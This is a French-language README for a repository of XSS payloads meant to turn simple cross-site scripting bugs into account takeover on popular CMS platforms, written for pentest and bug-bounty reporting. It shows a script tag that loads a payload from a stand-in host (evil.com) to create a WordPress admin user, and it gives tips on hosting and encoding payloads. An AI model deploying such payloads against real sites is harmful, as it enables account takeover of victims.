
XSS payloads designed to turn alert(1) into P1
Des payloads XSS conçus pour transformer alert(1) en P1.
Ce dépôt a été publié en même temps qu'un article de blog intitulé « How to Upgrade Your XSS Bugs from Medium to Critical » https://medium.com/@hakluke/upgrade-xss-from-medium-to-critical-cb96597b6cc4
Dans ce dépôt, vous trouverez un ensemble de fichiers JavaScript qui peuvent être chargés dans un payload XSS afin d'effectuer des fonctions sensibles sur les plateformes CMS populaires dans le contexte du navigateur de la victime. Cela peut aider à transformer un simple bug XSS en quelque chose de plus critique, comme une prise de contrôle de compte.
C'est parfait pour renforcer la sévérité d'un rapport de pentest ou de bug bounty en démontrant un impact de sécurité réel.
Les payloads sont ajoutés progressivement, au fil de mon temps libre. Il y en a beaucoup d'autres à venir. Si vous pouvez aider, les pull requests sont les bienvenues ! Si vous cherchez de l'inspiration pour savoir quoi créer, consultez l'onglet « issues » de ce dépôt.
La façon la plus simple d'utiliser ces payloads est de les héberger quelque part et de les charger dans l'attribut src d'une balise script pour votre payload XSS, comme ceci :
<script src="http://evil.com/wordpress_create_admin_user.js"></script>
Alternativement, selon le contexte et la longueur du payload, il peut parfois être minifié, encodé puis intégré directement dans la requête.
Afin d'héberger le fichier JavaScript, vous devrez peut-être définir le Content-Type sur application/javascript. Pour ce faire avec PHP, vous pouvez simplement ajouter cette ligne en haut de n'importe quel payload, l'enregistrer sous forme de fichier .php et l'héberger sur votre serveur web compatible PHP :
<?php header("Content-Type: application/javascript"); ?>
Cet article de Shift8 est ce qui m'a inspiré à créer ce dépôt. Le JS de l'article contient quelques fautes de frappe mineures, mais les concepts sont tout à fait justes.